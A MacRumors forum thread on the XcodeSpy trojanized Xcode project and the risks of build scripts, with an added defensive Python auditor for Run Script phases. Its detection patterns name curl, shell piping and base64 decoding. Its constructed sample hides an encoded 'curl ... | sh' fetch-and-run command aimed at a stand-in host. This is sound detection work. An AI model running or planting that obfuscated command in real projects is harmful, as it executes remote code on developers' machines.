MacRumors

macrumors bot (original poster):


Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).


Xcode is Apple's development environment for writing iOS and macOS apps, and the malicious project that's circulating is a doctored copy of TabBarInteraction, a legitimate open-source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the project carries a hidden, obfuscated Run Script build phase. Building the project in Xcode runs that script, which downloads and installs a custom variant of the open-source EggShell backdoor. EggShell can spy on the user through the microphone, camera, and keyboard, and can upload and download files.

Two variants of the custom EggShell payload were uploaded from Japan, first in August and then in October, so this attack has been in the wild for some time. SentinelOne writes:

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggests that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.
SentinelOne says that all Apple developers who use Xcode should exercise caution with shared Xcode projects.

Article Link: Security Researchers Discover XcodeSpy Malware That Targets Developers
 

bsamcash:
Why is it being called a Trojan when it has to be actively installed?

Edit: I'm an idiot. I misunderstood and didn't realize the malware was hidden. I thought individuals were purposefully installing it.
 

hot-gril:
Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, of course necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using CocoaPods, which is. Of course other dev platforms have similar risks.
 
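An added example of the check hot-gril is asking for; it is not code from MacRumors, SentinelOne, Apple or the TabBarInteraction project. Before building a downloaded project, it lists every Run Script build phase in the project's project.pbxproj and flags scripts that eval, base64-decode, download, or pipe into a shell, which is the route the hidden phase described in the article uses to fetch its payload. The pbxproj fragment and the base64-encoded command in SAMPLE_PBXPROJ are constructed for this demonstration. The same scan applies to the Pods.xcodeproj that CocoaPods generates, since a podspec can declare its own script phases.

```python
"""Audit the Run Script build phases in an Xcode project.pbxproj before building.

Added example, not code from MacRumors, SentinelOne or Apple. The pbxproj
fragment and the base64-encoded command in SAMPLE_PBXPROJ are constructed.
"""
import base64
import re
import sys
from pathlib import Path

# Start of a PBXShellScriptBuildPhase object: "<24-hex id> /* name */ = { isa = ...;"
PHASE_HEADER = re.compile(
    r'([0-9A-F]{24})(?: /\* (.*?) \*/)? = \{\s*isa = PBXShellScriptBuildPhase;')
# Objects close on a line of their own; pbxproj strings escape their newlines,
# so a literal newline followed by "};" cannot occur inside a script string.
OBJECT_END = re.compile(r'\n\s*\};')
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')

# Constructs that are legitimate in many builds but deserve a human look before
# the phase is allowed to run. Order here is the order of the findings list.
HEURISTICS = [
    (r'\beval\b', 'eval of dynamic content'),
    (r'\bbase64\b[^|\n]*\s-(d|D|-decode)\b', 'base64 decode'),
    (r'\b(curl|wget)\b', 'network download'),
    (r'\|\s*(ba|z)?sh\b', 'pipe into a shell'),
    (r'\b(python3?|perl|ruby|osascript)\s+-[ce]\b', 'inline interpreter one-liner'),
    (r'\bnohup\b|\bdisown\b|\blaunchctl\b', 'background process or persistence'),
]


def unquote(text, i):
    """Parse the double-quoted pbxproj string starting at text[i]; return (value, end)."""
    escapes = {'n': '\n', 't': '\t', '"': '"', '\\': '\\'}
    out, i = [], i + 1
    while text[i] != '"':
        if text[i] == '\\':
            out.append(escapes.get(text[i + 1], text[i + 1]))
            i += 2
        else:
            out.append(text[i])
            i += 1
    return ''.join(out), i + 1


def run_scripts(pbxproj):
    """Yield (object id, phase name, script text) for every Run Script phase."""
    for m in PHASE_HEADER.finditer(pbxproj):
        close = OBJECT_END.search(pbxproj, m.end())
        body = pbxproj[m.end():close.start() if close else len(pbxproj)]
        k = body.find('shellScript = ')
        if k == -1:          # phase object without a script: nothing to run
            continue
        v = k + len('shellScript = ')
        if body[v] == '"':
            script, _ = unquote(body, v)
        else:                # unquoted single-token value
            script = body[v:body.index(';', v)]
        yield m.group(1), m.group(2) or 'ShellScript', script


def scan(script):
    """Return the reasons a reviewer should read this script by hand (empty if none)."""
    findings = [why for pat, why in HEURISTICS if re.search(pat, script)]
    if any(len(line) > 200 for line in script.splitlines()):
        findings.append('very long line (possible encoded blob)')
    # Obfuscated phases usually hide the real command in base64; decode any
    # base64-looking token and run the same heuristics over the plaintext.
    for tok in B64_TOKEN.findall(script):
        try:
            plain = base64.b64decode(tok, validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in plain):
            findings += [f'{why} (inside base64 blob)'
                         for pat, why in HEURISTICS if re.search(pat, plain)]
    return findings


def audit_pbxproj(pbxproj):
    return [{'id': oid, 'name': name, 'script': script, 'findings': scan(script)}
            for oid, name, script in run_scripts(pbxproj)]


# Constructed sample: one ordinary lint phase and one stand-in for an obfuscated
# phase (the blob decodes to a constructed "curl ... | sh" one-liner).
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        A1B2C3D4E5F60718293A4B5C /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        F00DBA5E0000000000000001 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "# constructed stand-in for an obfuscated phase\neval \"$(echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3AgfCBzaA== | base64 -D)\"\n";
        };
    };
}
'''

if __name__ == '__main__':
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for p in audit_pbxproj(text):
        print(f"[{'REVIEW' if p['findings'] else 'ok'}] {p['name']} ({p['id']})")
        for why in p['findings']:
            print(f'    - {why}')
```

Run it as `python3 audit_runscripts.py Foo.xcodeproj/project.pbxproj` before opening the project in Xcode; with no argument it scans the embedded sample. A phase marked REVIEW is not necessarily malicious (many legitimate phases curl a toolchain or eval a generated environment), but it is the phase to read in full before pressing Build, and the id lets you find it in the pbxproj even when the Xcode UI has it scrolled out of view.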

Unsupported:

bsamcash said:
Why is it being called a Trojan when it has to be actively installed?

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

• Deleting data
• Blocking data
• Modifying data
• Copying data
• Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
 

amartinez1660:

hot-gril said:
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, of course necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using CocoaPods, which is. Of course other dev platforms have similar risks.
I don't know too much about this since I don't program directly in Xcode. You mean like importing a CocoaPods library could come with something that had the malware run the install script anyway? The spreading must be going at crazy rates, actually.

Could something like “brew install xxxxx” also spread it?
 

Suckfest 9001:
I have many computers of all types in the house, Mac and Windows. The only virus I ever got was on my Mac.

Turns out it was security by obscurity after all.

hot-gril:

amartinez1660 said:
I don't know too much about this since I don't program directly in Xcode. You mean like importing a CocoaPods library could come with something that had the malware run the install script anyway? The spreading must be going at crazy rates, actually.

Could something like "brew install xxxxx" also spread it?
Not 100% sure about CocoaPods supporting build scripts until I try it myself, but I'd be very surprised if it didn't. Someone please correct me if I'm wrong.

`brew install`, yep. I mean you're running arbitrary code with user-level permissions and no sandboxing. Nothing guarantees that it does what the label says. The default package lists are somewhat curated to avoid malware, but you can `brew tap` whatever you want. This is part of why Homebrew refuses to run as root, but I disagree with that choice, and so do other package managers.
 